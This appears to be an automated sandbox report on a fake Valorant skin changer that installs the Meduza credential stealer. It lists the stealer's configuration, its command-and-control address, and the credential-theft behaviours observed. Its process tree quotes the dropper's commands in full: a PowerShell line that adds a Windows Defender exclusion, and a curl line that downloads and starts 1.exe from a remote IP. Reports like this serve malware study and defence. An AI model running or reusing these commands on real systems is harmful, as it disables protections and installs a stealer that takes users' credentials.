Analysis
- max time kernel: 138s
- max time network: 137s
- platform: windows10-2004_x64
- resource: win10v2004-20250217-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20250217-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 08/03/2025, 07:51
- Static task: static1
- URLScan task: urlscan1
General
Malware Config
Extracted
- family: meduza
- 1
- 45.93.20.15
- anti_dbg: true
- anti_vm: true
- build_name: 1
- extensions: .txt; .doc; .xlsx
- grabber_maximum_size: 4194304
- port: 15666
- self_destruct: false
Signatures
Meduza Stealer payload (1 IoCs)
- resource: behavioral1/files/0x000f000000023b7b-315.dat, yara_rule: family_meduza
Meduza family
Command and Scripting Interpreter: PowerShell (1 TTPs, 1 IoCs)
Runs PowerShell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
- pid 2236, powershell.exe
Downloads MZ/PE file (1 IoCs)
- flow 92, pid 812, curl.exe
Checks computer location settings (2 TTPs, 2 IoCs)
Looks up the country code configured in the registry, likely for geofencing.
- Key value queried: \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Control Panel\International\Geo\Nation (Valorant_Skin_Changer.exe)
- Key value queried: \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Control Panel\International\Geo\Nation (1.exe)
Executes dropped EXE (2 IoCs)
- pid 5720, Valorant_Skin_Changer.exe
- pid 1256, 1.exe
Loads dropped DLL (1 IoCs)
- pid 5720, Valorant_Skin_Changer.exe
Reads user/profile data of web browsers (3 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.
Accesses Microsoft Outlook profiles (1 TTPs, 5 IoCs)
- Key opened: \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 (1.exe)
- Key opened: \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\SOFTWARE\Microsoft\Office\12.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 (1.exe)
- Key opened: \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\SOFTWARE\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 (1.exe)
- Key opened: \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 (1.exe)
- Key opened: \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 (1.exe)
Checks installed software on the system (1 TTPs)
Looks up Uninstall key entries in the registry to enumerate software on the system.
Looks up external IP address via web service (4 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
- flow 44: ipinfo.io
- flow 45: ipinfo.io
- flow 94: api.ipify.org
- flow 95: api.ipify.org
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).
System Location Discovery: System Language Discovery (1 TTPs, 4 IoCs)
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
- Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (powershell.exe)
- Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (cmd.exe)
- Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (Valorant_Skin_Changer.exe)
- Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (cmd.exe)
Checks SCSI registry key(s) (3 TTPs, 3 IoCs)
SCSI information is often read in order to detect sandboxing environments.
- Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 (taskmgr.exe)
- Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A (taskmgr.exe)
- Key value queried: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName (taskmgr.exe)
Enumerates system info in registry (2 TTPs, 3 IoCs)
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer (msedge.exe)
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName (msedge.exe)
- Key opened: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS (msedge.exe)
Modifies registry class (1 IoCs)
- Key created: \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000_Classes\Local Settings (msedge.exe)
Suspicious behavior: EnumeratesProcesses (35 IoCs; identical pid/process entries collapsed)
- pid 940, msedge.exe (repeated)
- pid 1992, msedge.exe (repeated)
- pid 1560, identity_helper.exe (repeated)
- pid 6044, msedge.exe (repeated)
- pid 2236, powershell.exe (repeated)
- pid 1256, 1.exe (repeated)
- pid 5952, taskmgr.exe (repeated)
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary (7 IoCs)
- pid 1992, msedge.exe (all 7 entries)
Suspicious use of AdjustPrivilegeToken (10 IoCs)
- Token: SeRestorePrivilege, pid 3276, 7zG.exe
- Token: 35, pid 3276, 7zG.exe
- Token: SeSecurityPrivilege, pid 3276, 7zG.exe (2 entries)
- Token: SeDebugPrivilege, pid 2236, powershell.exe
- Token: SeDebugPrivilege, pid 1256, 1.exe
- Token: SeImpersonatePrivilege, pid 1256, 1.exe
- Token: SeDebugPrivilege, pid 5952, taskmgr.exe
- Token: SeSystemProfilePrivilege, pid 5952, taskmgr.exe
- Token: SeCreateGlobalPrivilege, pid 5952, taskmgr.exe
Suspicious use of FindShellTrayWindow (64 IoCs)
- pid 1992, msedge.exe (all 64 entries)
Suspicious use of SendNotifyMessage (58 IoCs; identical pid/process entries collapsed)
- pid 1992, msedge.exe (repeated)
- pid 5952, taskmgr.exe (repeated)
Suspicious use of SetWindowsHookEx (3 IoCs)
- pid 5720, Valorant_Skin_Changer.exe (all 3 entries)
Suspicious use of WriteProcessMemory (64 IoCs; identical entries collapsed)
- PID 1992 wrote to memory of 5112; pid 1992, msedge.exe; procid_target 87 (2 entries)
- PID 1992 wrote to memory of 1680; pid 1992, msedge.exe; procid_target 88 (repeated)
- PID 1992 wrote to memory of 940; pid 1992, msedge.exe; procid_target 89 (2 entries)
- PID 1992 wrote to memory of 4896; pid 1992, msedge.exe; procid_target 90 (repeated)
outlook_office_path (1 IoCs)
- Key opened: \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 (1.exe)
outlook_win_path (1 IoCs)
- Key opened: \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 (1.exe)
Processes
Child processes are indented under their parent; each entry gives the image path, the command line, the signatures it triggered, and its PID.

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://valorantskinchanger.pro/about.html
  - Enumerates system info in registry
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  PID: 1992

  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd84b746f8,0x7ffd84b74708,0x7ffd84b74718
    PID: 5112

  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2156,9098430501380728888,15535421502408830465,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2164 /prefetch:2
    PID: 1680

  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2156,9098430501380728888,15535421502408830465,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2200 /prefetch:3
    - Suspicious behavior: EnumeratesProcesses
    PID: 940

  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2156,9098430501380728888,15535421502408830465,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2968 /prefetch:8
    PID: 4896

  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,9098430501380728888,15535421502408830465,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3368 /prefetch:1
    PID: 3188

  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,9098430501380728888,15535421502408830465,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3388 /prefetch:1
    PID: 3712

  C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2156,9098430501380728888,15535421502408830465,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4932 /prefetch:8
    PID: 4480

  C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2156,9098430501380728888,15535421502408830465,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4932 /prefetch:8
    - Suspicious behavior: EnumeratesProcesses
    PID: 1560

  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,9098430501380728888,15535421502408830465,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5968 /prefetch:1
    PID: 2896

  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,9098430501380728888,15535421502408830465,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5984 /prefetch:1
    PID: 1160

  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,9098430501380728888,15535421502408830465,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3420 /prefetch:1
    PID: 5044

  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,9098430501380728888,15535421502408830465,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3432 /prefetch:1
    PID: 3548

  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2156,9098430501380728888,15535421502408830465,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5292 /prefetch:8
    PID: 3188

  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,9098430501380728888,15535421502408830465,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5840 /prefetch:1
    PID: 1120

  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2156,9098430501380728888,15535421502408830465,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5376 /prefetch:8
    - Suspicious behavior: EnumeratesProcesses
    PID: 6044
C:\Windows\System32\CompPkgSrv.exe
  C:\Windows\System32\CompPkgSrv.exe -Embedding
  PID: 4212

C:\Windows\System32\CompPkgSrv.exe
  C:\Windows\System32\CompPkgSrv.exe -Embedding
  PID: 644

C:\Windows\System32\rundll32.exe
  C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
  PID: 5244

C:\Program Files\7-Zip\7zG.exe
  "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\ValorantSkin_Changer_2.7\" -spe -an -ai#7zMap24788:110:7zEvent21284
  - Suspicious use of AdjustPrivilegeToken
  PID: 3276
C:\Users\Admin\Downloads\ValorantSkin_Changer_2.7\Valorant_Skin_Changer.exe
  "C:\Users\Admin\Downloads\ValorantSkin_Changer_2.7\Valorant_Skin_Changer.exe"
  - Checks computer location settings
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID: 5720

  C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp\1.exe'"
    - System Location Discovery: System Language Discovery
    PID: 456

    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp\1.exe'"
      - Command and Scripting Interpreter: PowerShell
      - System Location Discovery: System Language Discovery
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      PID: 2236

  C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Temp\ & curl -o 1.exe http://147.45.44.170/1.exe & start 1.exe
    - System Location Discovery: System Language Discovery
    PID: 3608

    C:\Windows\SysWOW64\curl.exe
      curl -o 1.exe http://147.45.44.170/1.exe
      - Downloads MZ/PE file
      PID: 812

    C:\Windows\Temp\1.exe
      1.exe
      - Checks computer location settings
      - Executes dropped EXE
      - Accesses Microsoft Outlook profiles
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - outlook_office_path
      - outlook_win_path
      PID: 1256

C:\Windows\system32\taskmgr.exe
  "C:\Windows\system32\taskmgr.exe" /4
  - Checks SCSI registry key(s)
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SendNotifyMessage
  PID: 5952
Network
MITRE ATT&CK Enterprise v15
Credential Access
- Credentials from Password Stores (1)
- Credentials from Web Browsers (1)
- Unsecured Credentials (1)
- Credentials In Files (1)
Downloads